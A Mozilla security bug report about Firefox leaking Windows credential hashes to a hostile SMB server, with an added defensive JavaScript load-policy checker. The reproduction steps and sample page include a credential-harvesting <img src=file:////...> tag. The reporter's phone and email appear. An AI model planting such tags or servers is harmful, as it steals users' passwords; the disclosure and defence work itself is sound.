Firefox sends NT username/pass hash to evil SMB server which decrypts password

RESOLVED FIXED in mozilla1.8beta2

Status: RESOLVED FIXED
Product / Component: Core / Networking
Priority / Severity: P1 / major
Reported: 14 years ago; last modified: 12 years ago
Reporter: Aaron Spangler; Assigned: Darin Fisher
Version: Trunk; Target Milestone: mozilla1.8beta2
Hardware / OS: x86 / Windows 2000
Whiteboard: [sg:fix]

(Reporter)

Description

14 years ago
User-Agent:       Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  [Firefox 0.9.1]

In the URL above, a security exploit from a while back is described.  Firefox is
vulnerable to this attack.  Evil SMB & Web servers can collect your Windows
username, your Windows Lanman Password, your Windows NT Password, your Windows
Machine Name, your Windows Domain Name.  Since the evil server (not our client)
determines the Challenge in Challenge/Response, it can be a contrived value that
makes decrypting the original passwords much easier.  I can demonstrate to a few
key folks at Mozilla.org so that we can get it fixed, but I don't want to flood
the net with exploits on how it works.  Please contact me if I can provide more info.

Reproducible: Sometimes
Steps to Reproduce:
1. Set up Samba on a box on the net, modifying a few lines of code to fix the
"Challenge" to a weak value.
2. Place an image on the Samba share, allowing all to read once authenticated.
3. Put an <img src=file:////ipOfSMBServer/share/image.gif> on any or all web sites
you want to.
4. Firefox will strip off the first two slashes and convert the remainder to
backslashes.  For example, if the evil server was 10.2.3.4, the UNC pathname
fetched by Windows is \\10.2.3.4\share\image.gif.
5. The OS will then gladly provide all authentication asked for by the evil SMB server.

Actual Results:  
Most Windows clients using weak or no firewalls gladly send your credentials to
the evil SMB server where they are harvested.  Weak firewalls include standard
consumer grade (Linksys, Netgear...).

Expected Results:  
Prevent references to file://// if the referring url is not already file:////

Please contact me at (614)751-9329 after business hours if I can provide more
information.  You can also reach me by email at as@insight.rr.com.
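The Expected Results above amount to a load policy: a document may only reference a file: URL if it was itself loaded from a file: URL, and the four-slash form in step 3 is the one that Windows turns into a UNC path and authenticates to. The following is an added example, not Mozilla code and not the CheckLoadURI implementation discussed later in this bug. It parses file: URLs the way step 4 describes (so a blocked load can be logged with the remote host it pointed at), applies the referrer rule, and audits a constructed HTML snippet containing the report's `<img>` tag. The host 10.2.3.4 is the reporter's example; `evil.example` is a placeholder chosen here.

```javascript
// Added example: a minimal load-policy check modelled on the reporter's rule
// ("prevent references to file://// if the referring URL is not already file:////").
// Not Mozilla's code; names and the evil.example host are assumptions for this demo.

// Parse a file: URL. Returns null if `url` is not a file: URL.
//   file:////10.2.3.4/share/image.gif -> { unc: true, host: "10.2.3.4", uncPath: "\\\\10.2.3.4\\share\\image.gif" }
//   file:///C:/test.gif               -> { unc: false, host: null, uncPath: null }
function parseFileUrl(url) {
  const m = /^file:(\/+)(.*)$/i.exec(url.trim());
  if (!m) return null;
  const slashes = m[1].length;
  const rest = m[2];
  // Three slashes (file:///C:/...) is a plain local path. Two slashes carry an
  // authority (file://host/...), and four or more are the form from step 3 and 4:
  // the first two slashes are dropped and the remainder becomes a UNC path.
  if (slashes === 3) return { unc: false, host: null, uncPath: null };
  const [host, ...parts] = rest.split('/');
  if (!host || host.toLowerCase() === 'localhost') {
    return { unc: false, host: null, uncPath: null };
  }
  return { unc: true, host, uncPath: '\\\\' + [host, ...parts].join('\\') };
}

function scheme(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url.trim());
  return m ? m[1].toLowerCase() : null;
}

// Decide whether a document at `referrerUrl` may load `targetUrl`.
// Mirrors the Expected Results rule: file: targets only from file: referrers.
function checkLoadUri(referrerUrl, targetUrl) {
  const target = parseFileUrl(targetUrl);
  if (!target) return { allowed: true, reason: 'target is not a file: URL' };
  if (scheme(referrerUrl) === 'file') return { allowed: true, reason: 'referrer is a file: URL' };
  const where = target.unc ? `UNC share on ${target.host} (${target.uncPath})` : 'local file';
  return { allowed: false, reason: `non-file referrer may not load ${where}` };
}

// Audit every <img src=...> in a page for loads the policy would block.
// Handles quoted and unquoted src values (the report's example is unquoted).
function auditImgSources(html, pageUrl) {
  const re = /<img\b[^>]*\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const blocked = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = m[1] ?? m[2] ?? m[3];
    const verdict = checkLoadUri(pageUrl, src);
    if (!verdict.allowed) blocked.push({ src, reason: verdict.reason });
  }
  return blocked;
}

// Constructed sample page: an ordinary image plus the tag from step 3 of the report.
const SAMPLE_HTML = `
<html><body>
<img src="http://evil.example/logo.png">
<img src=file:////10.2.3.4/share/image.gif>
</body></html>`;

// Usage: run with node. Prints the one load the policy blocks and why.
for (const b of auditImgSources(SAMPLE_HTML, 'http://evil.example/page.html')) {
  console.log(`blocked ${b.src}: ${b.reason}`);
}
```

The audit reports the UNC host rather than just "blocked", which is the detail a defender wants in a log when looking for pages that try to make clients authenticate to an outside SMB server.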
(Assignee)

Comment 1

14 years ago
See also bug 69070.  Jesse points out that we'd still want to fix this bug as
well since there may be other places where CheckLoadURI isn't called.

To solve this bug, perhaps we just need to modify how we compute the origin for
file:// URLs when a SMB share is specified.

Confirming bug.  This is pretty serious given the relative weakness of the LMv1
hash.
Status: UNCONFIRMED → NEW
Ever confirmed: true
(Assignee)

Comment 2

14 years ago
bz: here's an example exploit that leverages bug 69070.
(Assignee)

Comment 3

14 years ago
> To solve this bug, perhaps we just need to modify how we compute the origin for
> file:// URLs when a SMB share is specified.

er... nevermind.  i was thinking about cross-site scripting, but that's
something else completely.  calling CheckLoadURI for <img> loads seems like the
right fix for this bug.  doing an audit of the code to make sure that we are
calling CheckLoadURI everywhere that it is needed is probably a good idea :)
Doing such an audit is an absolute must, yes.
Depends on: 69070

Comment 5

14 years ago
> Jesse points out that we'd still want to fix this bug as
> well since there may be other places where CheckLoadURI isn't called.

A better argument: we'd still want to fix this bug because sites shouldn't be
able to steal your Windows password by merely getting you to load a file: URL.
Not firefox-specific, over to networking.

Note bug 69070 has been fixed, but we should still fix this one.
Assignee: firefox → darin
Component: General → Networking
Product: Firefox → Core
Whiteboard: [sg:fix]
Version: unspecified → Trunk
(Assignee)

Comment 7

14 years ago
I think we want to implement bug 250691 to make it harder to exploit the user if
they happen to send their domain\username + password to an evil site.  Most
modern servers understand the NTLM hash (MD4 based), so we can probably get away
with not sending the older and much weaker LM hash.
Status: NEW → ASSIGNED
Target Milestone: --- → mozilla1.8beta2
(Assignee)

Updated

13 years ago
Severity: normal → major
Depends on: 250691
Priority: -- → P1
(Assignee)

Comment 8

13 years ago
This is now fixed for Firefox 1.1.  See bug 250691.

Is this something we should consider backporting?
Status: ASSIGNED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → FIXED

Comment 9

12 years ago
Does this still need to be security-sensitive?  It sounds like it was fixed for Firefox 1.5.
Group: security